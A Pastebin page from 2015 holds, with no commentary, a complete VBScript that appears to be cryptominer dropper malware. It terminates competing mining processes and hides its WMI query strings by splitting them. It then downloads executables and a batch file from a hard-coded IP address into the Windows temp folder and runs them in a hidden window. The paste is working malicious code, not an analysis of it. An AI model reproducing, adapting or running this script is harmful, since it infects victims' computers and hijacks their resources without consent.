SHARE
TWEET

Untitled

benkow_ Sep 23rd, 2015 (edited) 532 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Dim OSlag,OSver,numcpus,objOutParams,objWMIREGService
  3. Set objWMIREGService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\DEFAULT:StdRegProv")
  4. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Nls\Language", "Default",OSlag)
  5. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "CurrentVersion",OSver)
  6. objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "NUMBER_OF_PROCESSORS",numcpus)
  7. Set objFSO = CreateObject("Scripting.FileSystemObject")
  8. windir = objFSO.GetSpecialFolder(0)
  9. Dim needdl
  10. needdl = 1
  11.  
  12. user_agent_list=array("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", _
  13.               "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", _
  14.               "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16", _
  15.               "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", _
  16.               "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15", _
  17.               "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre", _
  18.               "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)", _
  19.               "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)")
  20. Randomize
  21. X=CInt(7*Rnd())
  22.  
  23. strComputer = "."
  24. Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
  25. Set cols=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
  26. For Each objItemm in cols
  27. If InStr(1,LCase(objItemm.CommandLine), LCase("-manliana")) > 0 Then objItemm.Terminate
  28. If InStr(1,LCase(objItemm.ExecutablePath), LCase("smssm.exe")) > 0 Then objItemm.Terminate
  29. Next
  30. wscript.sleep 5000
  31. Set colProcessList1=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
  32. For Each objItem in colProcessList1
  33. If InStr(1,objItem.CommandLine, "CGX2U2oeocN3DTJhyPG2cPg7xpRRTzNZkz") > 0 Then needdl = 0
  34. If InStr(1,objItem.CommandLine, "CcTzQsSWvf1zhbMA3kf2rpYxogEMcVjmJ3") > 0 Then needdl = 0
  35. If InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0 Then
  36.     objItem.Terminate
  37. End If
  38. notsyspath = not(InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\lsass.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\services.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\csrss.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\winlogon.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\smss.exe") > 0)
  39. hcline = InStr(1,LCase(objItem.CommandLine), "-datadir=") > 0 Or InStr(1,LCase(objItem.CommandLine), "ypool.net") > 0 Or InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0
  40. if notsyspath and hcline then
  41. objProcess.Terminate
  42. End If
  43. Next
  44.  
  45. If needdl = 1 Then
  46. OStype = X86orX64()
  47. if OStype = "x86" Then
  48. dl "http://66.186.188.227:88/32.exe","c:\windows\temp\mstdc.exe"
  49. dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
  50. runprg "c:\windows\temp\sst.bat"
  51. WScript.Quit
  52. ElseIf OStype = "x64" Then
  53. dl "http://66.186.188.227:88/64.exe","c:\windows\temp\mstdc.exe"
  54. dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
  55. runprg "c:\windows\temp\sst.bat"
  56. WScript.Quit
  57. End If
  58. End If
  59. Function dl(u,f)
  60. dim xHttp:Set xHttp = createobject("WinH" & "ttp.WinHt" & "tpRequ" & "est.5.1")
  61. dim bStrm:Set bStrm = createobject("Ad" & "od" & "b.S" & "tre" & "am")
  62. xHttp.Open "GET",u, 0
  63. xHttp.SetRequestHeader "User-Agent", user_agent_list(X)
  64. xHttp.Send
  65. with bStrm
  66. .type = 1
  67. .open
  68. .write xHttp.responseBody
  69. .savetofile f,2
  70. .close
  71. end with
  72. End Function
  73. Function runprg(ppath)
  74. Set objPS = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2")
  75. Set objStartup = objPS.Get("Win32_ProcessStartup")
  76. Set objConfig = objStartup.SpawnInstance_()
  77. objConfig.ShowWindow = 0
  78. Set objShare = objPS.Get("Win32_Process")
  79. Set objInParam = objShare.Methods_("Create").inParameters.SpawnInstance_()
  80. objInParam.Properties_.Item("CommandLine") =  ppath
  81. objInParam.Properties_.Item("ProcessStartupInformation") =  objConfig
  82. Set objOutParams = objPS.ExecMethod("Win32_Process", "Create", objInParam)
  83. End Function
  84. Function X86orX64()
  85.     On Error Resume Next
  86.     strComputer = "."
  87.     Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  88.     Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem",,48)
  89.     For Each objItem in colItems
  90.         If InStr(objItem.SystemType, "86") <> 0 Then
  91.             X86orX64 = "x86"
  92.         ElseIf InStr(objItem.SystemType, "64") <> 0 Then
  93.             X86orX64 = "x64"
  94.         Else
  95.             X86orX64 = objItem.SystemType
  96.         End If
  97.     Next
  98. End Function
  99. Function wlog(slog)
  100. Set objFSO = CreateObject("Scripting.FileSystemObject")
  101. windir = objFSO.GetSpecialFolder(0)
  102. Set f = objFSO.CreateTextFile(windir + "\wb2010kb.log",1)
  103. f.WriteLine(slog)
  104. f.Close
  105. Set objFSO = Nothing
  106. End Function
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top